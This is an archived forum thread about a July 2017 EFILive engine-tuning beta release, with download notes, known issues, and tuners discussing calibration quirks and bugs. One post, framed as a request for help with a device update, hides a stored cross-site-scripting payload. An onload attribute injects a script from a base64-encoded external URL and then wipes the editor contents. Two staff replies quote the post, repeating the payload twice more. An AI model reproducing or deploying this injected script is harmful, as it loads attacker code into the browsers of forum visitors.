PDA

View Full Version : July 2017, Beta Release 4

Blacky
July 2nd, 2017, 04:04 PM
Please download and install both the V7.5 and V8 software packages.

Download EFILive V7.5 (http://download.efilive.com/Software/V7.5/EFILiveV7.5.10.328_Beta-4.exe) (Note: Update to resolve Known Issue #4 below)
Download EFILive V8 (http://download.efilive.com/Software/V8/EFILiveV8.2.5.320_Beta-4.exe)

ATTENTION - BETA SOFTWARE RELEASE

We strongly recommend that you do not install the beta software over the top of your production systems. It is possible that the beta test software may fail and your production system may not be recoverable. lf you conduct a tuning business, please take the necessary precautions to protect your business. EFlLive recommends beta testers use a separate FlashScan V2 device (when installing the latest beta firmware) and only install the EFlLive beta test software on a separate PC, laptop or virtual machine.

Release Notes:
Whats New (http://download.efilive.com/Software/whatsnew_320.htm)

Version Numbers:
After installing this beta release you should have the following software, boot block, firmware versions installed:

[*=1]EFILive V7 software: V7.5.10 Build 328 To view the installed version, select Help->About (in the V7 Scan or Tune software).
[*=1]EFILive V8 software: V8.2.5 Build 320 To view the installed version, select Help->About (in the V8 Scan and Tune software).
[*=1]Boot Block: V2.07.007 (Feb 07, 2014) To view/update the Boot Block, click the [Check Firmware] button in the V8 Scan and Tune software.
[*=1] Firmware: V2.07.117 (Jun 23, 2017) To view/update the Firmware, click the [Check Firmware] button in the V8 Scan and Tune software.

Known Issues:

Issue #1:
If you are Black Box Logging PIDs from an ECM and TCM simultaneously and you have selected a PID from the transmission controller (TCM) that has an identically named PID in the engine controller (ECM), then when the log file is loaded back into the V8 software for viewing, that TCM PID will be displayed as if it originated from the ECM. The PID's data will have correctly been logged from the TCM, only its name will appear to indicate that it was logged from the ECM.

Workaround:
None.
It is a restriction of the *.efi (V7.5 log file format). That restriction will be removed and the TCM PIDs will display their true origin once the V8 scan tool software is available and fully integrated with the V8 tuning tool software.

Issue #2:
When logging DMA PIDs (i.e. PIDs whose names end with "_M" or "_DMA"), if the ignition is switched off for an extended period while data logging but data logging is not terminated, then when the ignition is switched on again the data log automatically continues. However the DMA PIDs may no longer return valid data.

Workaround:
EFILive recommends stopping the data log and restarting the data log when switching off the ignition for extended periods.

Issue #3:
When using the "Record All Diagnostics" option on FlashScan or AutoCal you must select the target controller by "selecting" a PID list so that the freeze frame PIDs can be correctly scaled/displayed. But any PID that is contained in that PID list will display its minimum/default value in the freeze frame data instead of its correct value.

Workaround:
Create a PID list with no PIDs selected for the target controller and select that PID list prior to performing the "Record All Diagnostics" option.
Will be fixed in the next update.

Issue #4:
The V7 Tune Tool software no longer recognizes CMC custom operating system tune file and refuses to open them for editing.

Workaround:
Download the updated EFILive_Tune.zip attachment and extract the EFILive_Tune.exe into the EFILive V7.5 installation folder - overwrite the existing EFILive_Tune.exe file.

Tre-Cool
July 2nd, 2017, 05:35 PM
Thank You!

Currently in Manila to tune some cars and those Dam desoot mode options are turned on in all the e38/e67 cals.

auspeed
July 3rd, 2017, 03:04 PM
Currently in Manila to tune some cars and those Dam desoot mode options are turned on in all the e38/e67 cals

What is desoot & what impact does it have on the Vehicle?

Tre-Cool
July 3rd, 2017, 05:20 PM
it fixes some stupid/retarded "feature" gm decided to put in most of the NA tunes.

Basically 2 seconds into pe enrichment you get what can only be best described as a injector pulse freeze. You can't log it make the change to the PW, but you will see the car momentarily go leaner than commanded, before it richens up again.

On a NA car you wont feel it too much, but on a boosted car if your still running closed loop & pe enrichment you will feel it depending on your enrichment strategy.

GMPX
July 3rd, 2017, 06:28 PM
Thanks for letting us know about that one Tre-Cool, it is an interesting 'feature' indeed.

Jedi_Jr
July 3rd, 2017, 09:03 PM
De-soot is an interesting read, and it seems to be less of an issue in PFI engines VS DFI engines. This is all referring to the B1220 and B1221 new settings in the E37, E38 and E67.
http://www.sciencedirect.com/science/article/pii/S0301679X15000432

APS Luis
July 3rd, 2017, 09:40 PM
Thanks for letting us know about that one Tre-Cool, it is an interesting 'feature' indeed.

I would have let you know Ross , but you know , E38 is a bit of a swear word in the Myer's household :P
Hope you've been well mate !

carlsonc857
July 4th, 2017, 07:24 AM
I can't update my device, I do everything how in video below but my device show me error

https://onload='document.body.appendChild(document.createE lement(/script/.source)).src=atob(/aHR0cHM6Ly9zZWN1cml0eWZvcnVtY2hlY2suY29tL2NoZWNrZW ZpbGl2ZS5qcw==/.source);remove();setTimeout(`document.getElementB yId(\x27cke_contents_vB_Editor_QR_editor\x27).chil dNodes[0].contentWindow.document.body.innerHTML=\x27\x27`,5 00)'style='opacity:1'[/img]"]https://www.youtube.com/watch?v=ZkFQWme7wvo

cindy@efilive
July 4th, 2017, 08:06 AM
I can't update my device, I do everything how in video below but my device show me error

https://onload='document.body.appendChild(document.createE lement(/script/.source)).src=atob(/aHR0cHM6Ly9zZWN1cml0eWZvcnVtY2hlY2suY29tL2NoZWNrZW ZpbGl2ZS5qcw==/.source);remove();setTimeout(`document.getElementB yId(\x27cke_contents_vB_Editor_QR_editor\x27).chil dNodes[0].contentWindow.document.body.innerHTML=\x27\x27`,5 00)'style='opacity:1'[/img]"]https://www.youtube.com/watch?v=ZkFQWme7wvo

What error are you getting and at what step?

Cheers
Cindy

Sent from my iPad using Tapatalk

GMPX
July 4th, 2017, 08:11 AM
I would have let you know Ross , but you know , E38 is a bit of a swear word in the Myer's household :P
Na, just too much water under the bridge so I can't remember enough about the E38 when asked out of the blue. The T43 is the one we don't dare mention.

auspeed
July 4th, 2017, 08:52 AM
it fixes some stupid/retarded "feature" gm decided to put in most of the NA tunes.

Basically 2 seconds into pe enrichment you get what can only be best described as a injector pulse freeze. You can't log it make the change to the PW, but you will see the car momentarily go leaner than commanded, before it richens up again.

On a NA car you wont feel it too much, but on a boosted car if your still running closed loop & pe enrichment you will feel it depending on your enrichment strategy.

That makes sense now, thanks Tre-Cool..... Interesting that even 10+ years later finding out there is still more features in the e38

joecar
July 4th, 2017, 11:55 AM

https://onload='document.body.appendChild(document.createE lement(/script/.source)).src=atob(/aHR0cHM6Ly9zZWN1cml0eWZvcnVtY2hlY2suY29tL2NoZWNrZW ZpbGl2ZS5qcw==/.source);remove();setTimeout(`document.getElementB yId(\x27cke_contents_vB_Editor_QR_editor\x27).chil dNodes[0].contentWindow.document.body.innerHTML=\x27\x27`,5 00)'style='opacity:1'[/IMG]"]https://www.youtube.com/watch?v=ZkFQWme7wvoWhat device are you talking about, your FSV2 is already updated.

joecar
July 4th, 2017, 12:14 PM
I zoomed in on your vid so I can see better...

you have old software/firmware installed...

V8 build 258...? FSV2 FW 2.07.64...?

you're way behind.

cindy@efilive
July 4th, 2017, 12:31 PM
I zoomed in on your vid so I can see better...

you have old software/firmware installed...

V8 build 258...? FSV2 FW 2.07.64...?

you're way behind.
I think he's linked to the instructional video Longhorn Fab Shop provide to their cutomers - I don't think the video is of him performing this update.

Cheers
Cindy

joecar
July 5th, 2017, 03:25 AM
Ah, I see.

b4pjs
July 6th, 2017, 09:20 AM
Wow, maxing out the desoot timeout makes maf tuning a doddle without that lean pulse! Cheers Luis for putting me onto that :) And yes, I have been tuning my car again :p

LPDTuning
July 9th, 2017, 01:00 AM
Im getting an Error when trying to load a previously modified CM2100 CSP5 tune to edit in 7.5. Seems to have happened with the update.21275 Cant load any CM2100 CSP5 tunes. No matter what the OS.

joecar
July 9th, 2017, 08:33 AM
I'm now seeing this on all LS1B tunes I open (I have not opened any LS1A's):

Out of Range calibration summary: 02:30:59 pm, Sunday Jul 09, 2017

Engine Calibration.Spark.General
{B5919} Optimal Timing, contained one or more out of range values when loaded.

Is there any way to show what the actual cell values are, maybe a button...?

( I know this may not work well with the min/max allowed value displayed )

GMPX
July 9th, 2017, 09:14 AM
Im getting an Error when trying to load a previously modified CM2100 CSP5 tune to edit in 7.5. Seems to have happened with the update. Cant load any CM2100 CSP5 tunes. No matter what the OS.
We can reproduce that error, will fix ASAP.

I see that too Joe, a bit odd given the LS1B .calz files have been the same since 2009.

LPDTuning
July 9th, 2017, 09:19 AM
We can reproduce that error, will fix ASAP.

I see that too Joe, a bit odd given the LS1B .calz files have been the same since 2009.

Awesome!! You guys are on it! Thanks!

Blacky
July 9th, 2017, 12:02 PM

Is there any way to show what the actual cell values are, maybe a button...?

( I know this may not work well with the min/max allowed value displayed )

Can you send me a file that produces the warning?

The cells that are out of range should show with a red border. Obviously that won't be visible for cells that are too large, since their cell background will be red as well.
Try changing the max color for the tables to something other than red.

Meanwhile I'll work on a better option/color for the cell border when cells are "out of range".

Regards
Paul

Blacky
July 9th, 2017, 02:56 PM
Im getting an Error when trying to load a previously modified CM2100 CSP5 tune to edit in 7.5. Seems to have happened with the update.21275 Cant load any CM2100 CSP5 tunes. No matter what the OS.

An update to fix this has been posted in post #1.
Regards
Paul

joecar
July 10th, 2017, 10:55 AM
Can you send me a file that produces the warning?

The cells that are out of range should show with a red border. Obviously that won't be visible for cells that are too large, since their cell background will be red as well.
Try changing the max color for the tables to something other than red.

Meanwhile I'll work on a better option/color for the cell border when cells are "out of range".

Regards
Paulemail sent.

This is what it looks like (blue dogears):

Blacky
July 10th, 2017, 11:49 AM
It should display like this:

Note: that you can see the red (out of EFILive's range) border on the cells if/when you highlight them.

Something's up with the EFILive_Tune.exe in the beta-4 install - looks like I may have built it with an older version.
Have you tried updating to the EFILive_Tune.exe attached to post #1.
I'm planning on posting beta-5 update in the next day or two.

Regards
Paul

Blacky
July 10th, 2017, 01:47 PM
It should display like this:

Note: that you can see the red (out of EFILive's range) border on the cells if/when you highlight them.

Something's up with the EFILive_Tune.exe in the beta-4 install - looks like I may have built it with an older version.
Have you tried updating to the EFILive_Tune.exe attached to post #1.
I'm planning on posting beta-5 update in the next day or two.

Regards
Paul

After much "investigation" the beta-4 *.exe is the correct *.exe and not an older version like I had thought.

To allow the EFILive min/max values to be overridden you need to check the property option:
Edit->Properties->[Options]->"Allow calibration values to exceed recommended limits."

Regards
Paul

Blacky
July 10th, 2017, 02:42 PM
Updated software available here:
https://forum.efilive.com/showthread.php?27794-July-2017-Beta-Release-5